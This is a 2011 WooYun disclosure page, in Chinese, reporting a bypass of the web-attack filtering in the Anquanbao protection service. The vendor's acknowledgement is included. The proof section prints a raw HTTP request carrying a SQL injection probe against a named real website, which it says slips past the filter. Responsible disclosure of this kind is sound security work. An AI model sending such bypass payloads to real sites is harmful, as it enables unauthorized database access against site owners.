当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2011-03179

漏洞标题:创新工厂安全宝安全防护绕过漏洞

相关厂商:安全宝

漏洞作者: rayh4c

提交时间:2011-11-01 15:38

修复时间:2011-12-01 15:38

公开时间:2011-12-01 15:38

漏洞类型:网络设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2011-11-01: 细节已通知厂商并且等待厂商处理中
2011-11-01: 厂商已经确认,细节仅向厂商公开
2011-11-11: 细节向核心白帽子及相关领域专家公开
2011-11-21: 细节向普通白帽子公开
2011-12-01: 细节向实习白帽子公开
2011-12-01: 细节向公众公开

简要描述:

安全宝本质是CND加DDOS防护加web安全防护,其web安全防护功能存在漏洞,可以轻易绕过。

详细说明:

web安全防护就想到于一个WAF,但是WEB应用过于复杂,很容易就能绕过,如安全宝无法防护80SEC所发现的几种攻击方法:参考
http://www.80sec.com/浅谈绕过waf的数种方法.html

漏洞证明:

如下面安全保护的网站www.51qljr.com,如果拦截到SQL注入攻击是405状态,用下面的包发送SQL注入攻击将绕过安全保护。
GET /xinxi/shownews.asp HTTP/1.1
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.51qljr.com
Pragma: no-cache
Content-Length: 21
Content-Type: application/x-www-form-urlencoded
id=572' and 1=1--

修复方案:

web应用太复杂,还有各种复杂场景可以绕过类似的安全防护。

版权声明:转载请注明来源 rayh4c@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2011-11-01 20:30

厂商回复:

今天下午,rayh4c@乌云指出安全宝存在安全隐患,安全宝团队已经分析完毕,在此表示衷心的感谢。 此隐患会使得攻击者绕过安全宝部分的检查,但不会降低用户自身原有的安全性,随后我们将公布完整的分析报告。 如同在过去20年,病毒技术的研究者极大地推动了反病毒技术的发展,网络漏洞的研究者们也实实在在地为信息安全技术的发展做出了卓越的贡献。安全宝团队感谢80Sec和乌云等众多优秀的网络安全研究者提出的安全建议,并期望和大家一起共同提升中国互联网的安全。

最新状态:

暂无